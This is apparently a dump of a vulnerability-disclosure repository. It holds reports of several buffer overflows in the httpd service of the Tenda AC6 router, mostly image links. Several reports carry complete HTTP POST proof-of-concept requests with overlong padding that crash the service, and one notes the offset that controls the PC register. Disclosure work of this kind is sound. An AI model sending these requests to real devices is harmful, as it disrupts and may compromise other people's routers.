https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/addWifiMacFilter_deviceId/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/addWifiMacFilter_deviceId/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/addWifiMacFilter_deviceId/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/addWifiMacFilter_deviceId/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/addWifiMacFilter_deviceId/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/addWifiMacFilter_deviceMac/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/addWifiMacFilter_deviceMac/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/addWifiMacFilter_deviceMac/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/addWifiMacFilter_deviceMac/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/addWifiMacFilter_deviceMac/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/addWifiMacFilter_deviceMac/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/formSetCfm/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetCfm/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/formSetCfm/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetCfm/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/formSetCfm/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetCfm/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/formSetCfm/images/04.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetCfm/images/04.png -------------------------------------------------------------------------------- /tenda_ac6/formSetClientState_deviceId/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetClientState_deviceId/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/formSetClientState_deviceId/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetClientState_deviceId/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/formSetClientState_deviceId/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetClientState_deviceId/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/formSetClientState_limitSpeed/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetClientState_limitSpeed/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/formSetClientState_limitSpeed/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetClientState_limitSpeed/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/formSetClientState_limitSpeed/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetClientState_limitSpeed/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/formSetClientState_limitSpeedUp/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetClientState_limitSpeedUp/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/formSetClientState_limitSpeedUp/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetClientState_limitSpeedUp/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/formSetClientState_limitSpeedUp/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetClientState_limitSpeedUp/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/formSetDeviceName/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetDeviceName/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/formSetDeviceName/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetDeviceName/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/formSetDeviceName/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetDeviceName/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/formSetDeviceName/images/04.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetDeviceName/images/04.png -------------------------------------------------------------------------------- /tenda_ac6/formSetFirewallCfg/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetFirewallCfg/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/formSetFirewallCfg/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetFirewallCfg/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/formSetFirewallCfg/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetFirewallCfg/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/formSetMacFilterCfg/formSetMacFilterCfg.md: -------------------------------------------------------------------------------- 1 | # Tenda AC6V1.0 V15.03.05.19 formSetMacFilterCfg buffer overflow vulnerability 2 | 3 | ## Description 4 | 5 | `Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling `/goform/formSetMacFilterCfg` request. 6 | 7 | ## Firmware information 8 | 9 | * Manufacturer's address: https://www.tenda.com.cn/ 10 | 11 | * Firmware download address : https://www.tenda.com.cn/download/detail-2681.html 12 | 13 | ## Affected version 14 | 15 | ![](images/01.png) 16 | 17 | ## Vulnerability details 18 | 19 | This vulnerability lies in the `/goform/formSetMacFilterCfg` page,The details are shown below: 20 | 21 | ![image-20221118102311680](images/02.png) 22 | 23 | ![image-20221118110536129](images/07.png) 24 | 25 | ![image-20221118105153664](images/05.png) 26 | 27 | ![image-20221118104935990](images/04.png) 28 | 29 | Using A*144 to padding, we can control PC register 30 | 31 | ![image-20221118110047143](images/06.png) 32 | 33 | ## POC 34 | 35 | This POC can result in a Dos. 36 | 37 | ``` 38 | POST /goform/setMacFilterCfg HTTP/1.1 39 | Host: 192.168.204.133 40 | Content-Length: 182 41 | Accept: */* 42 | X-Requested-With: XMLHttpRequest 43 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 44 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 45 | Origin: http://192.168.204.133 46 | Referer: http://192.168.204.133/mac_filter.html?random=0.4768296248219275& 47 | Accept-Encoding: gzip, deflate 48 | Accept-Language: zh-CN,zh;q=0.9 49 | Cookie: password=eeg1qw 50 | Connection: close 51 | 52 | macFilterType=black&deviceList=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB\r11 53 | ``` 54 | 55 | ![image-20221118103155735](images/03.png) 56 | 57 | -------------------------------------------------------------------------------- /tenda_ac6/formSetMacFilterCfg/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetMacFilterCfg/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/formSetMacFilterCfg/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetMacFilterCfg/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/formSetMacFilterCfg/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetMacFilterCfg/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/formSetMacFilterCfg/images/04.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetMacFilterCfg/images/04.png -------------------------------------------------------------------------------- /tenda_ac6/formSetMacFilterCfg/images/05.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetMacFilterCfg/images/05.png -------------------------------------------------------------------------------- /tenda_ac6/formSetMacFilterCfg/images/06.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetMacFilterCfg/images/06.png -------------------------------------------------------------------------------- /tenda_ac6/formSetMacFilterCfg/images/07.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetMacFilterCfg/images/07.png -------------------------------------------------------------------------------- /tenda_ac6/formSetPPTPServer_endIp/formSetPPTPServer_endIp.md: -------------------------------------------------------------------------------- 1 | # Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the endIp parameter in the formSetPPTPServer function. 2 | 3 | ## Description 4 | 5 | `Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling `/goform/SetPptpServerCfg` request. 6 | 7 | ## Firmware information 8 | 9 | * Manufacturer's address: https://www.tenda.com.cn/ 10 | 11 | * Firmware download address : https://www.tenda.com.cn/download/detail-2681.html 12 | 13 | ## Affected version 14 | 15 | ![](images/01.png) 16 | 17 | ## Vulnerability details 18 | 19 | This vulnerability lies in the `/goform/SetPptpServerCfg` page,The details are shown below: 20 | 21 | ![image-20221119210120477](images/02.png) 22 | 23 | 24 | 25 | ## POC 26 | 27 | This POC can result in a Dos. 28 | 29 | ``` 30 | POST /goform/SetPptpServerCfg HTTP/1.1 31 | Host: 192.168.204.133 32 | Content-Length: 1114 33 | Accept: */* 34 | X-Requested-With: XMLHttpRequest 35 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 36 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 37 | Origin: http://192.168.204.133 38 | Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268& 39 | Accept-Encoding: gzip, deflate 40 | Accept-Language: zh-CN,zh;q=0.9 41 | Cookie: password=iqb1qw; bLanguage=cn 42 | Connection: close 43 | 44 | endIp=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&startIp=192.168.1.1 45 | ``` 46 | 47 | ![image-20221118151225120](images/03.png) -------------------------------------------------------------------------------- /tenda_ac6/formSetPPTPServer_endIp/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetPPTPServer_endIp/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/formSetPPTPServer_endIp/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetPPTPServer_endIp/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/formSetPPTPServer_endIp/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetPPTPServer_endIp/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/formSetPPTPServer_startIp/formSetPPTPServer_startIp.md: -------------------------------------------------------------------------------- 1 | # Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the startIp parameter in the formSetPPTPServer function. 2 | 3 | ## Description 4 | 5 | `Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling `/goform/SetPptpServerCfg` request. 6 | 7 | ## Firmware information 8 | 9 | * Manufacturer's address: https://www.tenda.com.cn/ 10 | 11 | * Firmware download address : https://www.tenda.com.cn/download/detail-2681.html 12 | 13 | ## Affected version 14 | 15 | ![](images/01.png) 16 | 17 | ## Vulnerability details 18 | 19 | This vulnerability lies in the `/goform/SetPptpServerCfg` page,The details are shown below: 20 | 21 | ![image-20221119210120477](images/02.png) 22 | 23 | 24 | 25 | ## POC 26 | 27 | This POC can result in a Dos. 28 | 29 | ``` 30 | POST /goform/SetPptpServerCfg HTTP/1.1 31 | Host: 192.168.204.133 32 | Content-Length: 1114 33 | Accept: */* 34 | X-Requested-With: XMLHttpRequest 35 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 36 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 37 | Origin: http://192.168.204.133 38 | Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268& 39 | Accept-Encoding: gzip, deflate 40 | Accept-Language: zh-CN,zh;q=0.9 41 | Cookie: password=iqb1qw; bLanguage=cn 42 | Connection: close 43 | 44 | startIp=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&endIp=192.168.1.1 45 | ``` 46 | 47 | ![image-20221118151225120](images/03.png) -------------------------------------------------------------------------------- /tenda_ac6/formSetPPTPServer_startIp/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetPPTPServer_startIp/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/formSetPPTPServer_startIp/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetPPTPServer_startIp/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/formSetPPTPServer_startIp/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetPPTPServer_startIp/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/formSetQosBand/formSetQosBand.md: -------------------------------------------------------------------------------- 1 | # Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the list parameter in the formSetQosBand function. 2 | 3 | ## Description 4 | 5 | `Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling `/goform/SetNetControlList` request. 6 | 7 | ## Firmware information 8 | 9 | * Manufacturer's address: https://www.tenda.com.cn/ 10 | 11 | * Firmware download address : https://www.tenda.com.cn/download/detail-2681.html 12 | 13 | ## Affected version 14 | 15 | ![](images/01.png) 16 | 17 | ## Vulnerability details 18 | 19 | This vulnerability lies in the `/goform/SetNetControlList` page,The details are shown below: 20 | 21 | ![image-20221119203540103](images/02.png) 22 | 23 | Call sub_7D6D0 24 | 25 | ![image-20221119203704117](images/04.png) 26 | 27 | ## POC 28 | 29 | This POC can result in a Dos. 30 | 31 | ``` 32 | POST /goform/SetNetControlList HTTP/1.1 33 | Host: 192.168.204.133 34 | Content-Length: 1157 35 | Accept: */* 36 | X-Requested-With: XMLHttpRequest 37 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 38 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 39 | Origin: http://192.168.204.133 40 | Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268& 41 | Accept-Encoding: gzip, deflate 42 | Accept-Language: zh-CN,zh;q=0.9 43 | Cookie: password=iqb1qw; bLanguage=cn 44 | Connection: close 45 | 46 | list=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 47 | ``` 48 | 49 | ![image-20221118151225120](images/03.png) -------------------------------------------------------------------------------- /tenda_ac6/formSetQosBand/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetQosBand/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/formSetQosBand/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetQosBand/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/formSetQosBand/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetQosBand/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/formSetQosBand/images/04.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetQosBand/images/04.png -------------------------------------------------------------------------------- /tenda_ac6/formSetSpeedWan/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetSpeedWan/images/01.png -------------------------------------------------------------------------------- /tenda_ac6/formSetSpeedWan/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetSpeedWan/images/02.png -------------------------------------------------------------------------------- /tenda_ac6/formSetSpeedWan/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_ac6/formSetSpeedWan/images/03.png -------------------------------------------------------------------------------- /tenda_ac6/formSetVirtualSer/formSetVirtualSer.md: -------------------------------------------------------------------------------- 1 | # Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the list parameter in the formSetVirtualSer function. 2 | 3 | ## Description 4 | 5 | `Tenda` Router **AC6V1.0 V15.03.05.19** was discovered to contain a buffer overflow in the `httpd` module when handling `/goform/SetVirtualServerCfg` request. 6 | 7 | ## Firmware information 8 | 9 | * Manufacturer's address: https://www.tenda.com.cn/ 10 | 11 | * Firmware download address : https://www.tenda.com.cn/download/detail-2681.html 12 | 13 | ## Affected version 14 | 15 | ![](images/01.png) 16 | 17 | ## Vulnerability details 18 | 19 | This vulnerability lies in the `/goform/SetVirtualServerCfg` page,The details are shown below: 20 | 21 | ![image-20221119210842685](images/02.png) 22 | 23 | In sub_76068 24 | 25 | ![image-20221119210941319](images/04.png) 26 | 27 | ## POC 28 | 29 | This POC can result in a Dos. 30 | 31 | ``` 32 | POST /goform/SetVirtualServerCfg HTTP/1.1 33 | Host: 192.168.204.133 34 | Content-Length: 1093 35 | Accept: */* 36 | X-Requested-With: XMLHttpRequest 37 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 38 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 39 | Origin: http://192.168.204.133 40 | Referer: http://192.168.204.133/parental_control.html?random=0.7058891673130268& 41 | Accept-Encoding: gzip, deflate 42 | Accept-Language: zh-CN,zh;q=0.9 43 | Cookie: password=iqb1qw; bLanguage=cn 44 | Connection: close 45 | 46 | list=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa